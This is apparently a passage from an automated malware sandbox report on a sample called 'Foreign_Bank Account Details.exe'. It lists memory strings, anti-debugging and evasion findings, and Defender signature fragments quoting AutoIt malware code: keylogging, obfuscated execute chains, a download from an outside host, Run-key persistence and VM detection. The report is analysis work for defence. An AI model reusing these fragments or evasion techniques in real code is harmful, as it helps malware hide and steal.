Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp Binary or memory string: "/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: VMware_Virtual
Source: MpSigStub.exe, 00000023.00000003.18344475813.0000015B1C1D6000.00000004.00000001.sdmp Binary or memory string: Z"/providers/microsoft.compute/virtualmachines/",
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: %ProgramData%\Microsoft\Windows\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: z"vmware"$bisvm=trueelseif$smodel="virtualbox"
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp Binary or memory string: VBoxTrayToolWndClass
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: % *.bin.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp Binary or memory string: =mQ:#LowFiDetectsVmWare
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxGuest\\.\VMDRVSYSTEM\CurrentControlSet
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp Binary or memory string: vboxhook.dll
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp Binary or memory string: vmware
Source: MpSigStub.exe, 00000023.00000003.18300585182.0000015B1A681000.00000004.00000001.sdmp Binary or memory string: ,system\currentcontrolset\services\vboxguest
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: MpSigStub.exe, 00000023.00000003.18336377296.0000015B1BE9E000.00000004.00000001.sdmp Binary or memory string: VMWARETRAY.EXE
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp Binary or memory string: IsVmWare
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Hyper-V\*.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: azurevirtualmachinename
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.RCT.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18289300479.0000015B1BD55000.00000004.00000001.sdmp Binary or memory string: dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.AVHD.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-i386.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: =8*|%systemroot%\System32\Vmcompute.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18318011100.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: RPF:DetectsVmWare
Source: MpSigStub.exe, 00000023.00000003.18350843348.0000015B1B3CA000.00000004.00000001.sdmp Binary or memory string: VmWarePlayer
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp Binary or memory string: ifprocessexists("vboxservice.exe")thenexit
Source: RegAsm.exe, 00000008.00000002.21888487316.000000000154A000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWhT[
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17636064879.0000000002D19000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21893055738.0000000002FF9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: MpSigStub.exe, 00000023.00000003.18298458791.0000015B1AD5A000.00000004.00000001.sdmp Binary or memory string: RDC:\WINDOWS\SYSTEM32\VMBUSRES.DLL>C:\WINDOWS\SYSTEM32\UNKNOWNDLL.DLL
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: %qemu
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.HRL.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.toc.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp Binary or memory string: .VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: ,Administrator,Guest,vmware
Source: MpSigStub.exe, 00000023.00000003.18298458791.0000015B1AD5A000.00000004.00000001.sdmp Binary or memory string: !#RANSMATTR:PeLodDynDetVmwarepea_isexe&(pea_dt_error_heur_exit_criteria|pea_dt_error_heur_API_limit|pea_dt_error_bb_limit)&pea_dynmem_detects_vmware
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.bin.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp Binary or memory string: vmtools.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmwp.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.img.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: *.VMCX.|*|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: virtual hd]
Source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp Binary or memory string: VMware
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: &!*.txt.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: vboxservice
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: % *.xml.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18296359788.0000015B1C251000.00000004.00000001.sdmp Binary or memory string: f)a.VmDetector.VirtualMachineDetector
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: \\.\VBoxMiniRdrDN
Source: RegAsm.exe, 00000008.00000002.21889262552.00000000015AE000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: *.xml.|!\qemu-system-aarch64.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: Anti Sandboxie/VMware
Source: Foreign_Bank Account Details.exe, 00000001.00000002.17634657037.00000000022D0000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.21890837219.0000000001710000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: MpSigStub.exe, 00000023.00000003.18329340155.0000015B1AC0C000.00000004.00000001.sdmp Binary or memory string: 83*|%systemroot%\System32\Vmms.exe|Microsoft-Hyper-V
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp Binary or memory string: myapp.exeqemu
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: AntiVmWare
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: FA*.|!%ProgramFiles%\Android\Android Studio\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18286999705.0000015B0817D000.00000004.00000001.sdmp Binary or memory string: % *.img.|!\qemu-system-x86_64.exe
Source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp Binary or memory string: sandboxvmware]
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe System information queried: ModuleInformation
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 42_2_00007FF650D4ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4B030 FindNextFileW,FindClose,FindFirstFileW, 42_2_00007FF650D4B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D72504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_00007FF650D72504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 42_2_00007FF650CFF810

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread information set: HideFromDebugger
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process queried: DebugPort
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D64A10 GetProcessHeap, 42_2_00007FF650D64A10
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_004012D8 mov ebx, dword ptr fs:[00000030h] 1_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_00402061 mov ebx, dword ptr fs:[00000030h] 1_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 1_2_0040191F mov ebx, dword ptr fs:[00000030h] 1_2_0040191F
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D53BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00007FF650D53BFC
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_012A7166 KiUserExceptionDispatcher,LdrInitializeThunk, 8_2_012A7166
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: page read and write | page guard
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6B530 SetUnhandledExceptionFilter, 42_2_00007FF650D6B530
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 42_2_00007FF650D6B798
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D53BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00007FF650D53BFC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 42_2_00007FF650D6BD68
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D6BF4C SetUnhandledExceptionFilter, 42_2_00007FF650D6BF4C

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1390000
Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\DFC5CBF6-B4C4-B49D-335D-ADBEBB78227A.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
Contains functionality to query the security center for anti-virus and firewall products
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \enativ\4xnav12p.txt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: = "http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: http://portal.usanativ.com/sites/default/files/nativsetup.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/predator.ar_0109!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: global $sdeouljcvthbiisnlmbthiecg = execute
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: stringreplace ( "skxpyvmtnwvrovjagkuhnqvobgbtrkxpyvmtnwvrovjagkuhnqvobgbinkxpyv
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: vobgbnkxpyvmtnwvrovjagkuhnqvobgb" , "kxpyvmtnwvrovjagkuhnqvobgb" , "" ) )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: " & ".exe"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: = stringsplit ( tcuuq (
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alfper:clearlock!autoit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $overlay = guicreate ( "clearlock" , @desktopwidth , @desktopheight ,
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: _blockinputex ( 3 , "[:alpha:]|[:number:]|{enter}|{backspace}
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:hstr:trojanspy:win32/keylogger.bad!bit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: \\software\microsoft\windows\currentversion\run
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: nlogfiles-" & $date & "-" & $pwd & ".htm
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: >func _logkeypress ( $what2log )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/autoitinject.aa!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dreturn execute ( "stringtobinary($
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: lexecute ( " bitxor($xxxxx, $i, $xx)" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d= execute ( "mod($xxxxxxx, 256)" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: := execute ( "dllstructcreate(
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/cryptedautoit.sq!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: &while wingetprocess
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: if winclose =
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: return shellexecute ( @workingdir & chr ( 92 ) & $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: & chr ( 92 ) & $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dim $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ] = [ "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0.exe" , "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: `.exe" ]
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:hstr:autoit_rc4encodefunc
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0f84dc000000b90001000088c82c0188840deffeffffe2f38365f4008365fc00817dfc00010000
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 7d478b45fc31d2f775f0920345100fb6008b4dfc0fb68c0df0feffff01c80345f425ff000000
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: return shellexecute ( $sfilepath , "" , @workingdir , "print" , $ishow = default @sw_hide $ishow )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dllcall ( "shell32.dll" , "ulong_ptr" , "shellexecutew" , "hwnd" , $hparent , $stypeofverb , $sverb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dllcall ( "shell32.dll" , "int" , "shfileoperationw"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "performing backup only"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: runwait ( @comspec & " /c "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/racealer.pa!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: inetget ( "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ://professorlog.xyz/
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: .zip" , "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: = objcreate ( "shell.application" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: run ( "c:\users\public\run
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:win32/injectorautoit.sq!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 4dllopen ( "advapi32.dll" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: func _crypt_encryptdata ( $
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: p = true )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dobjcreate ( "msxml2.domdocument" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 0.datatype = "bin.base64"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: return seterror (
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:autoit/salvagedawn.b!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: -dwv1.3.au3.509"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $"4054656d70446972"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "313232"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "3937"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "0x457865637574652842696e617279746f737472696e672827307834353738363536333735373436353238343236
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 633323339323732393239272929"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#hstr:win32/predator.ar_3108!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: global $d3076 = execute
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: dim $t31qy644 = $d3076 ( "chr" )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $t31qy644 ( 303 + -204 ) & $t31qy644 ( 315 + -204 ) & $t31qy644 ( 304 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 ) & $t31qy644 ( 312 + -204 )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $r323038323oc0a ( $n32313731jj , $t31qy644 ( 319 + -204 ) & $t31qy644 ( 308 + -204 ) & $t31qy644 ( 305 + -204 )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $m323130303w3e ( $u33lrw44yn ) & $t31qy644 ( 297 + -204 ) , $r32313131va5m7zl )
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:hstr:trojan:win32/startpage.zw!bit
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "start page"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "default_page_url"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: regwrite ( "hkey_current_user\software\microsoft\internet explorer\main" , "search bar"
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:ransom:win32/tron.pb!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $extension = "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: guicreate ( "
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: _filecreate ( @appdatadir & "\network\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: _filecreate ( @localappdatadir & "\microsoft\windows\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: filecopy ( "c:\programdata\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: " , "c:\
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#allowlist:bonzo
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_outfile=helpnew.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_res_description=bonzo uvnc-helper
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_res_companyname=bonzo
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: autoit3wrapper_run_before=echo ""1"" >""c:\users\bonzo\temp\lock"
